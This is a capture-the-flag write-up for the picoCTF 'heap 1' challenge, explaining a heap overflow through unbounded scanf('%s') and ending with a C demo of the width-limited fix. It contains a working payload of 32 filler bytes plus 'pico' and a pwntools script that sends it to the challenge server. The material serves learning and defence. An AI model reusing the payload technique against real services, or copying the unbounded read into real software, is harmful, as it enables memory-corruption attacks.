⚒️ Heap 1
| Category | Author |
|---|---|
| ⚒️ Binary Exploitation | Abrxs, pr1or1tyQ |
Challenge Prompt
Can you control your overflow?
Download the binary here.
Download the source here.
Problem Type
- Buffer Overflow
Solve
We are given the program source code:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FLAGSIZE_MAX 64
// amount of memory allocated for input_data
#define INPUT_DATA_SIZE 5
// amount of memory allocated for safe_var
#define SAFE_VAR_SIZE 5

int num_allocs;
char *safe_var;
char *input_data;

void check_win() {
    if (!strcmp(safe_var, "pico")) {
        printf("\nYOU WIN\n");
        // code removed for brevity
    }
}

void write_buffer() {
    printf("Data for buffer: ");
    fflush(stdout);
    // no field width on %s: reads until whitespace, however long the input is
    scanf("%s", input_data);
}
// code removed for brevity
```
The program is written in C. The scanf call with the %s format specifier in write_buffer is inherently dangerous because it performs no bounds checking.
It keeps writing characters into input_data until it hits whitespace (a space or a newline), completely ignoring the fact that input_data was only allocated 5 bytes (INPUT_DATA_SIZE at the beginning of the code).
When we run the program we see 2 addresses and their data. If we can overwrite bico with pico we can get the program to print the flag.
We can take our 2 values and put them into a hex calculator like RapidTables and figure out how far apart the locations are:
In this case they are 32 bytes apart, so we need to send 32 A characters to cover the gap, followed by the characters we want to write over bico.
You can simply send 32 A characters followed by pico (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico) to the program after picking option 2, then pick option 4 to print the flag, which is what I did at first.
But I wanted to get some more practice with pwntools, so I decided to try that too:
```python
from pwn import *

HOST = 'tethys.picoctf.net'
PORT = 64172

p = remote(HOST, PORT)

# option 2: write to input_data
p.recvuntil(b'Enter your choice: ')
p.sendline(b"2")
p.recvuntil(b'Data for buffer: ')
# 32 bytes of filler to reach safe_var, then the value check_win expects
p.sendline(b"A" * 32 + b"pico")

# option 4: print the flag (only works once safe_var reads "pico")
p.recvuntil(b'Enter your choice: ')
p.sendline(b"4")
print(p.recvall().decode())
```
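To show why the 32-byte distance matters and what the fix looks like, here is an added example that is not part of the writeup or the challenge source: one array models the two heap chunks 32 bytes apart, an unbounded copy stands in for scanf("%s"), and a width-limited copy stands in for scanf("%4s"). The arena, the offsets and the function names are my own assumptions.

```c
#include <stdio.h>
#include <string.h>

#define INPUT_DATA_SIZE 5      /* as in the challenge source */
#define SAFE_VAR_OFFSET 32     /* distance between the two chunks seen at runtime */
#define ARENA_SIZE 64
#define PAYLOAD "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico" /* constructed: 32 filler bytes, then "pico" */

/* One array models the heap (assumption): input_data at offset 0, safe_var at offset 32,
 * so the overflow is a plain in-bounds write we can inspect instead of undefined behaviour. */
struct arena { char mem[ARENA_SIZE]; };

static void arena_init(struct arena *a) {
    memset(a->mem, 0, sizeof a->mem);
    memcpy(a->mem + SAFE_VAR_OFFSET, "bico", 5);   /* safe_var starts as "bico" */
}

/* Like scanf("%s"): copies up to the first whitespace, ignoring INPUT_DATA_SIZE
 * (clamped to the arena only so the demo itself never leaves the array). */
static void write_buffer_unbounded(struct arena *a, const char *input) {
    size_t n = strcspn(input, " \t\n");
    if (n > (size_t)(ARENA_SIZE - 1)) n = ARENA_SIZE - 1;
    memcpy(a->mem, input, n);
    a->mem[n] = '\0';
}

/* Like scanf("%4s"): the field width keeps the write inside the 5-byte chunk. */
static void write_buffer_bounded(struct arena *a, const char *input) {
    size_t n = strcspn(input, " \t\n");
    if (n > (size_t)(INPUT_DATA_SIZE - 1)) n = INPUT_DATA_SIZE - 1;
    memcpy(a->mem, input, n);
    a->mem[n] = '\0';
}

/* Mirrors check_win(): 1 when safe_var now reads "pico". */
static int check_win(const struct arena *a) {
    return strcmp(a->mem + SAFE_VAR_OFFSET, "pico") == 0;
}

/* Feeds one payload through the chosen reader; returns 1 if safe_var was hijacked. */
int overflow_reaches_safe_var(const char *payload, int bounded) {
    struct arena a;
    arena_init(&a);
    if (bounded) write_buffer_bounded(&a, payload); else write_buffer_unbounded(&a, payload);
    return check_win(&a);
}

int main(void) {
    printf("scanf(\"%%s\")  -> win=%d\n", overflow_reaches_safe_var(PAYLOAD, 0));
    printf("scanf(\"%%4s\") -> win=%d\n", overflow_reaches_safe_var(PAYLOAD, 1));
}
```

With the unbounded reader the same 36-byte input lands "pico" exactly on safe_var; with the field width only four bytes are ever written, so check_win still sees "bico".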